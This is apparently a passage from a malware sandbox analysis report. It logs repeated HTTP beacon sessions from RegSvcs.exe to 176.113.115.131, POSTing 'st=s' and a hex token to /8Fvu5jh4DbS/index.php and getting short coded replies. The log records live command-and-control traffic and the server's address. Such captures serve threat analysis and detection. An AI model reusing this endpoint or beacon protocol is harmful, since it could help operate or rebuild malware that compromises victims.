                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:44:31.162390947 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:31 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    66192.168.2.456123176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:32.797504902 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:44:33.512027025 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:33 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    67192.168.2.456124176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:35.036297083 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:44:35.733525991 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:35 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    68192.168.2.456125176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:37.361598969 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:44:38.066068888 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:37 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    69192.168.2.456126176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:39.577842951 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:44:40.266031027 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:40 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    70192.168.2.456127176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:41.891217947 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:44:42.597739935 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:42 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    71192.168.2.456128176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:44.110306025 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:44:44.827529907 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:44 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    72192.168.2.456129176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:46.456520081 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:44:47.142812014 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:47 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    73192.168.2.456130176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:48.660511971 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:44:49.372358084 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:49 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    74192.168.2.456131176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:51.020490885 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:44:51.730273962 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:51 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    75192.168.2.456132176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:53.256550074 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:44:53.964806080 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:53 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    76192.168.2.456133176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:55.656970024 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:44:56.340996981 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:56 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    77192.168.2.456134176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:57.865582943 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:44:58.567358971 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:58 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    78192.168.2.456135176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:00.204128981 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:00.904352903 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:00 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    79192.168.2.456136176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:02.421617031 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:03.143517971 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:03 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    80192.168.2.456137176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:04.784568071 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:05.482996941 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:05 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    81192.168.2.456138176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:07.000576973 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:07.716079950 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    82192.168.2.456139176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:09.346865892 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:10.053905964 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:09 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    83192.168.2.456140176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:11.563364983 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:12.274687052 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:12 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    84192.168.2.456141176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:13.924757957 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:14.620548964 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:14 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    85192.168.2.456142176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:16.141515970 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:16.834738016 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:16 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    86192.168.2.456143176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
